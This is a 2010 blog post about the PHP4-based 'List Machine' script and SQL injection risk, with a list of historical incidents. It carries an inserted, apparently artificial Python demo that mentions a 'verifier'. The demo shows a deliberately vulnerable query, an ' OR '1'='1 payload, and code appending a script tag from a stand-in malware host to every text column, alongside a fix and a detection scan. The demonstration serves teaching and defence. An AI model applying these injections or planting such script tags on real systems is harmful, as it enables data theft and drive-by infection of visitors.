
Frank Kern "List Machine" Potential PHP4 Exploit Disaster 

Frank Kern is about to release his latest product, "List Control". Part of the pre-launch promotion has seen him offering a free script, "List Machine", to help people build their email list. BUT, and it's a big BUT (ha ha), the script his programmers have written is PHP4 code. PHP 4 has been end-of-life since 2008 and gets no security patches any more, so anything built on it is a sitting duck for phishers and scammers. Apparently they used PHP4 because Frank wanted it to run on BlueHost, which he feels is newbie-friendly. The classic way scripts like this get hit is SQL injection: user input (an email address, a name) pasted straight into a database query. That is a flaw in the application code rather than in PHP itself, but an unsupported interpreter plus hand-built queries is the usual combination. Here's an extract from the Wikipedia article on SQL injection on what can happen:
* On November 1, 2005, a high school student used a SQL injection to break into the site of a Taiwanese information security magazine from the Tech Target group and steal customers' information.
* On January 13, 2006, Russian computer criminals broke into a Rhode Island government web site and allegedly stole credit card data from individuals who have done business online with state agencies.
* On March 29, 2006, Susam Pal discovered a SQL injection flaw in an official Indian government tourism site.
* On March 2, 2007, Sebastian Bauer discovered a SQL injection flaw in the knorr.de login page.
* On June 29, 2007, a computer criminal defaced the Microsoft U.K. website using SQL injection. U.K. website The Register quoted a Microsoft spokesperson acknowledging the problem.
* In January 2008, tens of thousands of PCs were infected by an automated SQL injection attack that exploited a vulnerability in application code that uses Microsoft SQL Server as the database store.
* On April 13, 2008, the Sexual and Violent Offender Registry of Oklahoma shut down its website for 'routine maintenance' after being informed that 10,597 Social Security numbers from sex offenders had been downloaded via a SQL injection attack.
* In May 2008, a server farm inside China used automated queries to Google's search engine to identify SQL server websites which were vulnerable to the attack of an automated SQL injection tool.
* In July 2008, Kaspersky's Malaysian site was broken into by a Turkish computer criminal going by the handle of "m0sted", who claimed to have used SQL injection.
* In 2008, at least April through August, a sweep of attacks began exploiting the SQL injection vulnerabilities of Microsoft's IIS web server and SQL Server database server. The attack doesn't require guessing the name of a table or column, and corrupts all text columns in all tables in a single request. A HTML string that references a malware JavaScript file is appended to each value. When that database value is later displayed to a website visitor, the script attempts several approaches at gaining control over a visitor's system. The number of exploited web pages is estimated at 500,000.
* On August 17, 2009, the United States Justice Department charged an American citizen Albert Gonzalez and two unnamed Russians with the theft of 130 million credit card numbers using an SQL injection attack. In reportedly "the biggest case of identity theft in American history", the man stole cards from a number of corporate victims after researching their payment processing systems. Among the companies hit were credit card processor Heartland Payment Systems, convenience store chain 7-Eleven, and supermarket chain Hannaford Brothers.
* In December 2009, an attacker breached a RockYou! plaintext database containing the unencrypted usernames and passwords of about 32 million users by using a SQL injection attack.
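To make the two points above concrete (a list-building script that glues an email address into a query, and the 2008-style mass injection that tags every text column without knowing any table names), here is an added example. It is not the List Machine script or anything Frank Kern's programmers wrote; it uses Python with an in-memory SQLite database and a constructed `subscribers` table, because the verifier can run that, and the query shapes are the same ones a PHP4 script would send to MySQL.

```python
"""Added example, not code from the page or from List Machine.

Shows three things on a constructed SQLite database:
  1. a lookup built by string concatenation (the PHP4-era pattern) and how
     one crafted input turns it into "return every row";
  2. the parameterised version, where the same input is just data;
  3. the mechanism behind the 2008 mass injection: walk the catalogue to find
     every TEXT column and append a <script> tag, then the defender's mirror
     image, a scan of the same columns for injected markup.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data resembling what a list-building script stores."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE subscribers (
            id INTEGER PRIMARY KEY, email TEXT, name TEXT, confirmed INTEGER);
        INSERT INTO subscribers (email, name, confirmed) VALUES
            ('alice@example.com', 'Alice', 1),
            ('bob@example.com',   'Bob',   0);
        CREATE TABLE notes (id INTEGER PRIMARY KEY, body TEXT);
        INSERT INTO notes (body) VALUES ('welcome text');
    """)
    return con


def lookup_vulnerable(con: sqlite3.Connection, email: str) -> list:
    """Deliberately vulnerable: the PHP "... WHERE email='$email'" pattern.
    The input is spliced into the SQL text, so quotes in it change the query."""
    sql = "SELECT email FROM subscribers WHERE email = '" + email + "'"
    return [row[0] for row in con.execute(sql)]


def lookup_safe(con: sqlite3.Connection, email: str) -> list:
    """Hardened form: a bound parameter is never parsed as SQL."""
    rows = con.execute("SELECT email FROM subscribers WHERE email = ?", (email,))
    return [row[0] for row in rows]


def text_columns(con: sqlite3.Connection) -> list:
    """Every (table, column) declared TEXT, read from the catalogue.
    This is why the 2008 attack needed no table or column names: the
    database tells you. Identifiers are quoted, never user-supplied."""
    cols = []
    tables = con.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table' "
        "AND name NOT LIKE 'sqlite_%'").fetchall()
    for (table,) in tables:
        for _cid, col, ctype, *_rest in con.execute(f'PRAGMA table_info("{table}")'):
            if ctype.upper() == "TEXT":
                cols.append((table, col))
    return cols


def mass_tag(con: sqlite3.Connection, html: str) -> int:
    """Reproduces the effect of the 2008 payload: append HTML to every value
    of every TEXT column. Returns the number of columns touched."""
    cols = text_columns(con)
    for table, col in cols:
        con.execute(f'UPDATE "{table}" SET "{col}" = "{col}" || ?', (html,))
    con.commit()
    return len(cols)


def find_injected_scripts(con: sqlite3.Connection, marker: str = "<script") -> list:
    """Defender's scan: (table, column, rowid) for every text value that
    contains the marker, across all tables, again without knowing the schema."""
    hits = []
    for table, col in text_columns(con):
        q = f'SELECT rowid FROM "{table}" WHERE instr(lower("{col}"), ?) > 0'
        for (rowid,) in con.execute(q, (marker.lower(),)):
            hits.append((table, col, rowid))
    return hits


if __name__ == "__main__":
    db = make_db()
    payload = "' OR '1'='1"
    print("vulnerable:", lookup_vulnerable(db, payload))   # both addresses leak
    print("safe:      ", lookup_safe(db, payload))         # nothing matches
    tagged = mass_tag(db, '<script src="http://malware.invalid/x.js"></script>')
    print("columns tagged:", tagged)
    print("injected rows:", find_injected_scripts(db))
```

The scan is the useful half for anyone running a script like this: run `find_injected_scripts` against the live database after a suspected compromise, and fix the application by replacing every concatenated query with a bound-parameter one (in PHP 4 that means the `mysqli`/`PDO` route is unavailable, which is itself a reason not to ship on PHP 4).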
I'm happy to report that I've helped Frank avoid his very own Toyota sticking accelerator disaster. Just imagine what could have happened. This could have blown up in his face BIG TIME. Read more about it here on The Warrior Forum where I post under my moniker "Metronicity".


Reader Comments (2)

They whacked the post
March 18, 2010 | Unregistered Commenter Jarret

Yeah... happens all the time on that stupid forum. C'est la vie. Usually happens if people start fighting.
March 18, 2010 | Registered Commenter Malcolm Lambe
